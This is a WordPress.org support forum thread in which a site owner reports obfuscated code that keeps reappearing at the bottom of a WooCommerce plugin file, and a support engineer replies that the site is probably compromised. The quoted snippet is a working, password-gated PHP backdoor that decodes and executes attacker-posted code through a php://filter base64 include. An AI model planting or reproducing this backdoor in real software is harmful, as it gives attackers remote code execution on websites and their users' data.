Strange code has been found by hosting malware | WordPress.org

Resolved malenkiymyk
(@malenkiymyk)

1 year, 8 months ago

Hi there.
We have to start independent investigation due to stripe report. After detailed scan investigation company reported strange code inside woocommerce.php file at the very bottom:

if (isset($_POST[“_dalfgj89qerauid”],$_POST[‘WP_5f2a8b’]) && sha1($_POST[‘WP_5f2a8b’]) == “5f2a8bb0b28dcbe4fde4d6ce75500dbfb8a45100″) { $_oxyu = tempnam(sys_get_temp_dir(),”dafkjgjdk”); file_put_contents($_oxyu,$_POST[“_dalfgj89qerauid”]); require_once “php”.”:”.”//filt”.”e”.”r/c”.”onvert.”.”ba”.”s”.”e”.”64-“.”d”.”e”.”code/co”.”n”.”v”.”er”.”t.b”.”a”.”s”.”e64-de”.”co”.”de/”.”resou”.”rce”.”=”.$_oxyu; unlink($_oxyu); die(); }

Every time we removing above code and saving file that code returning to the same place quite quick. Can anyone help please or have ideas how to sort this issue please.

Thanks

Viewing 1 replies (of 1 total)

Luminus Alabi a11n
(@luminus)

Automattic Happiness Engineer

1 year, 8 months ago

Hi @malenkiymyk,

You’ve most likely got an issue with your site being compromised.

If you’ve sourced yot theme or any of your plugins from a site that isn’t trusted, that may be the source of the compromise.

You’ll want to work with either your hosting company or your developers to identify the source of the issue.

Viewing 1 replies (of 1 total)

The topic ‘Strange code has been found by hosting malware’ is closed to new replies.

Tags

malware

In: Plugins
1 reply
2 participants
Last reply from: Luminus Alabi a11n
Last activity: 1 year, 8 months ago
Status: resolved